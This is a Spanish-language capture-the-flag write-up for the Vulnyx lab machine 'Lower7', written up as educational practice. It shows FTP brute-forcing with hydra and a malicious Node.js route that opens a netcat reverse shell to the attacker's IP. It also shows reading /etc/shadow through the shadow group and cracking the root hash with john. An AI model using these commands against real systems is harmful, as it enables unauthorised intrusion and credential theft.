cd ~/blog

~/writeups/vulnyx/34-lower7.md

34 - Lower7

low Linux vulnyx 08-11-2025
FTP banner user disclosureWeak FTP passwordNode.js route upload (RCE)shadow group + root hash cracking
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.245

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.245
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 18:47 -0300
Nmap scan report for 10.207.245.245
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
3000/tcp open  ppp
MAC Address: 08:00:27:59:99:D4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.34 seconds
 nmap -sCV -p 21,3000 -oN 02-targeted.txt 10.207.245.245
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 18:48 -0300
Nmap scan report for 10.207.245.245
Host is up (0.00041s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
3000/tcp open  http    Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.20 seconds

El banner de FTP revela un nombre de usuario:

 ftp 10.207.245.245
Connected to 10.207.245.245.
220 "Hello a.clark, Welcome to your FTP server."
Name (10.207.245.245:wh01s17):

Con el usuario a.clark, hacemos fuerza bruta contra FTP:

 hydra -l 'a.clark' -P ~/Documents/wordlists/rockyou.txt 10.207.245.245 ftp -t 64
...
[21][ftp] host: 10.207.245.245   login: a.clark   password: dragon
...

Nos logueamos por FTP; no hay archivos interesantes, pero comprobamos que tenemos permisos de escritura:

 ftp 10.207.245.245
Connected to 10.207.245.245.
220 "Hello a.clark, Welcome to your FTP server."
Name (10.207.245.245:wh01s17): a.clark
331 Please specify the password.
Password: dragon
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Oct 13 14:38 .
drwxrwxrwx    2 1000     1000         4096 Oct 13 14:38 ..
226 Directory send OK.

ftp> put file.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-------    1 1000     1000            0 Nov 08 22:56 file.txt
226 Directory send OK.

Como en el puerto 3000 corre un servidor Node.js que sirve este directorio, subimos una ruta .js maliciosa que ejecuta una reverse shell:

 cat pwned.js
const { exec } = require('child_process');
module.exports = (req, res) => {
  exec('busybox nc 10.207.245.35 1234 -e /bin/bash', (error, stdout) => {
    res.send(`${stdout.trim()}`);
  });
};

Accedemos a http://10.207.245.245:3000/pwned.js para disparar la shell como a.clark:

 ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.245:45622.
script /dev/null -c bash
Script iniciado, el fichero de anotación de salida es '/dev/null'.
a.clark@lower7:~$

Para escalar privilegios, revisamos los grupos del usuario y vemos que pertenece al grupo shadow:

a.clark@lower7:~$ id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)

El grupo shadow (Writable Critical Files Privesc) nos permite leer /etc/shadow; obtenemos el hash de root y lo crackeamos con john:

a.clark@lower7:~$ cat /etc/shadow | grep root
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::

 john -w=/home/wh01s17/Documents/wordlists/rockyou_utf8.txt hash_root
...
bassman          (root)
...

Nos autenticamos como root con la contraseña descubierta:

a.clark@lower7:~$ su root
Contraseña: bassman
root@lower7:/home/a.clark#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados